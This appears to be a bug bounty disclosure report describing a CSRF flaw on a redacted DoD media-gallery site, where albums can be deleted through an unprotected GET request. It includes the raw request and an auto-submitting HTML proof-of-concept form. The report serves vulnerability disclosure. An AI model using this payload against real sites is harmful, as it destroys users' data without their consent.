CSRF Attack leads to delete album at

**Description:** Through research, I discovered a CSRF vulnerability in one of the DoD asset. `www.████████` There is a feature to create albums for a collection of media such as photos and videos. While performing some actions on it, I found that there is no CSRF verification when deleting albums. Additionally, the delete request is based on GET, So it'll more easier for an attacker to exploit it.. ## Vulnerable Request ``` GET /mediagallery/delete/id/{album-id} HTTP/2 Host: www.██████ Cookie: {YOUR-SESSSION} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: https://www.█████████/mediagallery/index ``` ## References - Here is the detailed Video PoC ████ ## Impact - CSRF Attack - Delete users album ## System Host(s) www.█████ ## Affected Product(s) and Version(s) ## CVE Numbers ## Steps to Reproduce 1 - Create an account on `www.███████` 2 - Navigate to `https://www.█████████/search?filter[type]=image` , and click on the below icon to create an album. ████████ 3 - Here is the CSRF PoC exploit. ``` <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://www.█████/mediagallery/delete/id/{album-id}"> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html> ``` 4 - Replace the `{album-id}` with your actual `album-id` ## Suggested Mitigation/Remediation Actions